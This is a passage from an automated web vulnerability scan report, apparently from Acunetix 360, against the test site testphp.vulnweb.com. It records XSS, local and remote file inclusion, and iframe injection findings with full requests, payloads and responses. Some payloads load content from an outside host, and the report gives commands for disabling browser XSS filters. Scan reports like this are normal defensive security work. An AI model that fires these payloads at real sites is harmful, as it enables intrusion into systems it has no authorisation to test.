Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:11:27 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: '"--></style></scRipt><scRipt>netsparker(0x00B670)</scRipt></li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
4.14. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname Smith
POST uemail invicti@example.com
POST signup signup
POST uuname Smith
POST uaddress 3
POST upass2 Inv1@cti
POST ucc '"--></style></scRipt><scRipt>netsparker(0x00B74F)</scRipt>
POST upass Inv1@cti
POST uphone 3
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 187
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=Smith&uemail=invicti%40example.com&signup=signup&uuname=Smith&uaddress=3&upass2=Inv1%40cti&ucc='"--></style></scRipt><scRipt>netsparker(0x00B74F)</scRipt>&upass=Inv1%40cti&uphone=3

Response

Response Time (ms) : 206.5154
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:12:02 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: 3</li><li>Credit card: '"--></style></scRipt><scRipt>netsparker(0x00B74F)</scRipt></li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>
4.15. http://testphp.vulnweb.com/secured/newuser.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST urname Smith
POST uemail invicti@example.com
POST signup signup
POST uuname Smith
POST uaddress 3
POST upass2 Inv1@cti
POST ucc 4916613944329494
POST upass Inv1@cti
POST uphone '"--></style></scRipt><scRipt>netsparker(0x00B95D)</scRipt>
Go to the highlighted output

Request

POST /secured/newuser.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 202
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/signup.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

urname=Smith&uemail=invicti%40example.com&signup=signup&uuname=Smith&uaddress=3&upass2=Inv1%40cti&ucc=4916613944329494&upass=Inv1%40cti&uphone='"--></style></scRipt><scRipt>netsparker(0x00B95D)</scRipt>

Response

Response Time (ms) : 195.4793
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:12:35 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>add new user</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<div id="masthead"> 
  <h1 id="siteName">ACUNETIX ART</h1> 
</div>
<div id="content">
	<p>You have been introduced to our database with the above informations:</p><ul><li>Username: Smith</li><li>Password: Inv1@cti</li><li>Name: Smith</li><li>Address: 3</li><li>E-Mail: invicti@example.com</li><li>Phone number: '"--></style></scRipt><scRipt>netsparker(0x00B95D)</scRipt></li><li>Credit card: 4916613944329494</li></ul><p>Now you can login from <a href='http://testphp.vulnweb.com/login.php'>here.</p></div>
</body>
</html>

Remedy

The issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, output should be encoded according to the output location and context. For example, if the output goes in to a JavaScript block within the HTML document, then output needs to be encoded accordingly. Encoding can get very complex, therefore it's strongly recommended to use an encoding library such as OWASP ESAPI and Microsoft Anti-cross-site scripting.

Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one. 

External References

Remedy References

Proof of Concept Notes

Generated XSS exploit might not work due to browser XSS filtering. Please follow the guidelines below in order to disable XSS filtering for different browsers. Also note that;

  • XSS filtering is a feature that's enabled by default in some of the modern browsers. It should only be disabled temporarily to test exploits and should be reverted back if the browser is actively used other than testing purposes.
  • Even though browsers have certain checks to prevent Cross-site scripting attacks in practice there are a variety of ways to bypass this mechanism therefore a web application should not rely on this kind of client-side browser checks.

Chrome

  • Open command prompt.
  • Go to folder where chrome.exe is located.
  • Run the command chrome.exe --args --disable-xss-auditor

Internet Explorer

  • Click Tools->Internet Options and then navigate to the Security Tab.
  • Click Custom level and scroll towards the bottom where you will find that Enable XSS filter is currently Enabled.
  • Set it to disabled. Click OK.
  • Click Yes to accept the warning followed by Apply.

Firefox

  • Go to about:config in the URL address bar.
  • In the search field, type urlbar.filter and find browser.urlbar.filter.javascript.
  • Set its value to false by double clicking the row.

 Safari

  • To disable the XSS Auditor, open Terminal and executing the command:  defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool FALSE
  • Relaunch the browser and visit the PoC URL
  • Please don't forget to enable XSS auditor again:  defaults write com.apple.Safari "com.apple.Safari.ContentPageGroupIdentifier.WebKit2XSSAuditorEnabled" -bool TRUE

CLASSIFICATION

PCI DSS v3.2 6.5.7

CVSS 3.0 SCORE
Base7.4 (High)
Temporal7.4 (High)
Environmental7.4 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base7.4 (High)
Temporal7.4 (High)
Environmental7.4 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

5. Password Transmitted over HTTP

HIGH
1
CONFIRMED
1

Acunetix 360 detected that password data is being transmitted over HTTP.

Impact

If an attacker can intercept network traffic, he/she can steal users' credentials.

Vulnerabilities

5.1. http://testphp.vulnweb.com/login.php
CONFIRMED
CONFIRMED

Input Name

  • pass

Form target action

  • http://testphp.vulnweb.com/userinfo.php

Form name

  • loginform
Go to the highlighted output

Request

GET /login.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 196.098
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


" action="userinfo.php">
	<table cellpadding="4" cellspacing="1">
		<tr><td>Username : </td><td><input name="uname" type="text" size="20" style="width:120px;"></td></tr>
		<tr><td>Password : </td><td><input name="pass" type="password" size="20" style="width:120px;"></td></tr>
		<tr><td colspan="2" align="right"><input type="submit" value="login" style="width:75px;"></td></tr>
	</table>
	</form>
  	</div>
	<div class="story">
	<h3>
        You can also <a href="s

Actions to Take

  1. See the remedy for solution.
  2. Move all of your critical forms and pages to HTTPS and do not serve them over HTTP.

Remedy

All sensitive data should be transferred over HTTPS rather than HTTP. Forms should be served over HTTPS. All aspects of the application that accept user input, starting from the login process, should only be served over HTTPS.

CLASSIFICATION

PCI DSS v3.2 6.5.4

CVSS 3.0 SCORE
Base5.7 (Medium)
Temporal5.7 (Medium)
Environmental5.7 (Medium)

CVSS Vector String
CVSS:3.0/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

CVSS 3.1 SCORE
Base5.7 (Medium)
Temporal5.7 (Medium)
Environmental5.7 (Medium)

CVSS Vector String
CVSS:3.1/AV:A/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N

6. Local File Inclusion

HIGH
2
CONFIRMED
2

Acunetix 360 identified a Local File Inclusion vulnerability, which occurs when a file from the target system is injected into the attacked server page.

Acunetix 360 confirmed this issue by reading some files from the target web server.

Impact

The impact can vary, based on the exploitation and the read permission of the web server user. Depending on these factors, an attacker might carry out one or more of the following attacks:
  • Gather usernames via an "/etc/passwd" file
  • Harvest useful information from the log files, such as "/apache/logs/error.log" or "/apache/logs/access.log"
  • Remotely execute commands by combining this vulnerability with some other attack vectors, such as file upload vulnerability or log injection

Vulnerabilities

6.1. http://testphp.vulnweb.com/showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1
CONFIRMED
CONFIRMED
Method Parameter Value
GET file data:;base64,TlM3NzU0NTYxNDQ2NTc1
Go to the highlighted output

Request

GET /showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/AJAX/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 202.8833
Total Bytes Received : 189
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:05:24 GMT

NS7754561446575
6.2. http://testphp.vulnweb.com/showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1&size=160
CONFIRMED
CONFIRMED
Method Parameter Value
GET file data:;base64,TlM3NzU0NTYxNDQ2NTc1
GET size 160
Go to the highlighted output

Request

GET /showimage.php?file=data%3a%3bbase64%2cTlM3NzU0NTYxNDQ2NTc1&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 193.5783
Total Bytes Received : 189
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:08:07 GMT

NS7754561446575

Remedy

  • If possible, do not permit appending file paths directly. Make them hard-coded or selectable from a limited hard-coded path list via an index variable.
  • If you definitely need dynamic path concatenation, ensure you only accept required characters such as "a-Z0-9" and do not allow ".." or "/" or "%00" (null byte) or any other similar unexpected characters.
  • It is important to limit the API to allow inclusion only from a directory and directories below it. This way you can ensure any potential attack cannot perform a directory traversal attack.

External References

CLASSIFICATION

PCI DSS v3.2 6.5.8

CVSS 3.0 SCORE
Base8.6 (High)
Temporal8.6 (High)
Environmental8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base8.6 (High)
Temporal8.6 (High)
Environmental8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

7. Cross-site Scripting via Remote File Inclusion

HIGH
2

Acunetix 360 detected Cross-site Scripting via Remote File Inclusion, which makes it is possible to conduct cross-site scripting attacks by including arbitrary client-side dynamic scripts (JavaScript, VBScript).

Cross-site scripting allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application. This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by the user has been interpreted as HTML/JavaScript/VBScript by the browser.

Cross-site scripting targets the users of the application instead of the server. Although this is limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Impact

There are many different attacks that can be leveraged through the use of cross-site scripting, including:
  • Hijacking user's active session.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

7.1. http://testphp.vulnweb.com/showimage.php?file=hTTp%3a%2f%2fr87.com%2fn
Method Parameter Value
GET file hTTp://r87.com/n

Notes

  • Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Certainty



Go to the highlighted output

Request

GET /showimage.php?file=hTTp%3a%2f%2fr87.com%2fn HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/AJAX/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 951.9989
Total Bytes Received : 189
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:05:16 GMT

<? print chr(78).chr(69).chr(84).chr(83).chr(80).chr(65).chr(82).chr(75).chr(69).chr(82).chr(95).chr(70).chr(48).chr(77).chr(49) ?>
<? print chr(45).(44353702950+(intval($_GET["nsxint"])*4567)).chr(45) ?>
<script>netsparkerRFI(0x066666)</script>
7.2. http://testphp.vulnweb.com/showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160
Method Parameter Value
GET file hTTp://r87.com/n
GET size 160

Certainty



Go to the highlighted output

Request

GET /showimage.php?file=hTTp%3a%2f%2fr87.com%2fn&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 872.7507
Total Bytes Received : 189
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:08:02 GMT

<? print chr(78).chr(69).chr(84).chr(83).chr(80).chr(65).chr(82).chr(75).chr(69).chr(82).chr(95).chr(70).chr(48).chr(77).chr(49) ?>
<? print chr(45).(44353702950+(intval($_GET["nsxint"])*4567)).chr(45) ?>
<script>netsparkerRFI(0x066666)</script>

Remedy

The issue occurs because the browser interprets the input as active HTML, Javascript or VbScript. To avoid this, all input and output from the application should be filtered. Output should be filtered according to the output format and location. Typically, the output location is HTML. Where the output is HTML, ensure all active content is removed prior to its presentation to the server.

Additionally, you should implement a strong Content Security Policy (CSP) as a defence-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications. 

CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross Site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one.

External References

Remedy References

CLASSIFICATION

PCI DSS v3.2 6.5.7

CVSS 3.0 SCORE
Base8.6 (High)
Temporal8.6 (High)
Environmental8.6 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base8.6 (High)
Temporal8.6 (High)
Environmental8.6 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N

8. [Possible] Cross-site Scripting

MEDIUM
2

Acunetix 360 detected Possible Cross-site Scripting, which allows an attacker to execute a dynamic script (JavaScript, VBScript) in the context of the application.

This allows several different attack opportunities, mostly hijacking the current session of the user or changing the look of the page by changing the HTML on the fly to steal the user's credentials. This happens because the input entered by a user has been interpreted as HTML/JavaScript/VBScript by the browser. Cross-site scripting targets the users of the application instead of the server. Although this is a limitation, since it allows attackers to hijack other users' sessions, an attacker might attack an administrator to gain full control over the application.

Although Acunetix 360 believes there is a cross-site scripting in here, it could not confirm it. We strongly recommend investigating the issue manually to ensure it is cross-site scripting and needs to be addressed.

Impact

There are many different attacks that can be leveraged through the use of XSS, including:
  • Hijacking user's active session.
  • Changing the look of the page within the victim's browser.
  • Mounting a successful phishing attack.
  • Intercepting data and performing man-in-the-middle attacks.

Vulnerabilities

8.1. http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x008F96)%3C/scRipt%3E
Method Parameter Value
GET file '"--></style></scRipt><scRipt>netsparker(0x008F96)</scRipt>

Notes

  • Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Proof URL

Certainty



Go to the highlighted output

Request

GET /showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x008F96)%3C/scRipt%3E HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Referer: http://testphp.vulnweb.com/AJAX/
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 200.4432
Total Bytes Received : 189
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:05:15 GMT


Warning: fopen(): Unable to access '"--></style></scRipt><scRipt>netsparker(0x008F96)</scRipt> in /hj/var/www/showimage.php on line 7

Warning: fopen('"--></style></scRipt><scRipt>netsparker(0x008F96)</scRipt>): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 7

Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 13
8.2. http://testphp.vulnweb.com/showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x00976E)%3C/scRipt%3E&size=160
Method Parameter Value
GET file '"--></style></scRipt><scRipt>netsparker(0x00976E)</scRipt>
GET size 160

Notes

  • Due to the Content-type header of the response, exploitation of this vulnerability might not be possible because of the browser used or because of the presence of certain web tools. We recommend that you fix this even if it is not an exploitable XSS vulnerability because it can allow an attacker to introduce other attacks to exploit it. But, these issues are not confirmed; you will need to manually confirm them yourself. In general, lack of filtering in the response can cause Cross-site Scripting vulnerabilities in browsers with built-in mime sniffing (such as Internet Explorer).

Proof URL

Certainty



Go to the highlighted output

Request

GET /showimage.php?file='%22--%3E%3C/style%3E%3C/scRipt%3E%3CscRipt%3Enetsparker(0x00976E)%3C/scRipt%3E&size=160 HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/search.php?test=query
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Response

Response Time (ms) : 195.4299
Total Bytes Received : 189
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: image/jpeg
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:07:58 GMT


Warning: fopen(): Unable to access '"--></style></scRipt><scRipt>netsparker(0x00976E)</scRipt> in /hj/var/www/showimage.php on line 19

Warning: fopen('"--></style></scRipt><scRipt>netsparker(0x00976E)</scRipt>): failed to open stream: No such file or directory in /hj/var/www/showimage.php on line 19

Warning: fpassthru() expects parameter 1 to be resource, boolean given in /hj/var/www/showimage.php on line 25

Remedy

This issue occurs because the browser interprets the input as active HTML, JavaScript or VBScript. To avoid this, all input and output from the application should be filtered / encoded. Output should be filtered / encoded according to the output format and location.

There are a number of pre-defined, well structured whitelist libraries available for many different environments. Good examples of these include OWASP Reform and Microsoft Anti-Cross-site Scripting libraries.

Additionally, you should implement a strong Content Security Policy (CSP) as a defense-in-depth measure if an XSS vulnerability is mistakenly introduced. Due to the complexity of XSS-Prevention and the lack of secure standard behavior in programming languages and frameworks, XSS vulnerabilities are still common in web applications.

CSP will act as a safeguard that can prevent an attacker from successfully exploiting Cross-site Scripting vulnerabilities in your website and is advised in any kind of application. Please make sure to scan your application again with Content Security Policy checks enabled after implementing CSP, in order to avoid common mistakes that can impact the effectiveness of your policy. There are a few pitfalls that can render your CSP policy useless and we highly recommend reading the resources linked in the reference section before you start to implement one. 

External References

Remedy References

CLASSIFICATION

PCI DSS v3.2 6.5.7

CVSS 3.0 SCORE
Base7.4 (High)
Temporal7.4 (High)
Environmental7.4 (High)

CVSS Vector String
CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

CVSS 3.1 SCORE
Base7.4 (High)
Temporal7.4 (High)
Environmental7.4 (High)

CVSS Vector String
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:N/A:N

9. Frame Injection

MEDIUM
16
CONFIRMED
14

Acunetix 360 detected Frame Injection, which occurs when a frame on a vulnerable web page displays another web page via a user-controllable input.

Impact

An attacker might use this vulnerability to redirect users to other malicious websites that are used for phishing and similar attacks. Additionally they might place a fake login form in the frame, which can be used to steal credentials from your users.

It should be noted that attackers can also abuse injected frames in order to circumvent certain client side security mechanisms. Developers might overwrite functions to make it harder for attackers to abuse a vulnerability.

If an attacker uses a javascript: URL as src attribute of an iframe, the malicious JavaScript code is executed under the origin of the vulnerable website. However, it has access to a fresh window object without any overwritten functions.

Vulnerabilities

9.1. http://testphp.vulnweb.com/comment.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST Submit Submit
POST name <iframe src="http://r87.com/?"></iframe>
POST phpaction echo $_POST[comment];
POST comment
Go to the highlighted output

Request

POST /comment.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 134
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/comment.php?aid=3
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

Submit=Submit&name=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&phpaction=echo+%24_POST%5bcomment%5d%3b&comment=

Response

Response Time (ms) : 188.0811
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 
HTTP/1.1 200 OK
Server: nginx/1.4.1
X-Powered-By: PHP/5.3.10-1~lucid+2uwsgi2
Connection: keep-alive
Content-Type: text/html
Transfer-Encoding: chunked
Date: Fri, 02 Jan 1970 08:15:48 GMT

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<title>
<iframe src="http://r87.com/?"></iframe> commented</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
<!--
body {
	margin-left: 0px;
	margin-top: 0px;
	margin-right: 0px;
	margin-bottom: 0px;
}
-->
</style>
<link href="style.css" rel="stylesheet" type="text/css">
</head>
<body>
<p class='story'><iframe src="http://r87.com/?"></iframe>, thank you for your comment.</p><p class='story'><i></p></i></body>
</html>
9.2. http://testphp.vulnweb.com/guestbook.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST submit add message
POST name <iframe src="http://r87.com/?"></iframe>
POST text
Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 96
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

submit=add+message&name=%3ciframe+src%3d%22http%3a%2f%2fr87.com%2f%3f%22%3e%3c%2fiframe%3e&text=

Response

Response Time (ms) : 197.2414
Total Bytes Received : 188
Body Length : 0
Is Compressed : No 


v class="story">
	<table width="100%" cellpadding="4" cellspacing="1"><tr><td colspan="2"><h2>Our guestbook</h2></td></tr><tr><td align="left" valign="middle" style="background-color:#F5F5F5"><strong><iframe src="http://r87.com/?"></iframe></strong></td><td align="right" style="background-color:#F5F5F5">01.02.1970, 9:09 am</td></tr><tr><td colspan="2"><img src="/images/remark.gif">&nbsp;&nbsp;</td></tr></table>	 </div>
	  <div class="st

9.3. http://testphp.vulnweb.com/guestbook.php
CONFIRMED
CONFIRMED
Method Parameter Value
POST submit add message
POST name anonymous user
POST text <iframe src="http://r87.com/?"></iframe>
Go to the highlighted output

Request

POST /guestbook.php HTTP/1.1
Host: testphp.vulnweb.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Cache-Control: no-cache
Content-Length: 110
Content-Type: application/x-www-form-urlencoded
Cookie: login=test%2Ftest
Referer: http://testphp.vulnweb.com/guestbook.php
User-Agent: Mozilla/5.0 (Windows NT 10.0; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.0 Safari/537.36
X-Scanner: Acunetix 360

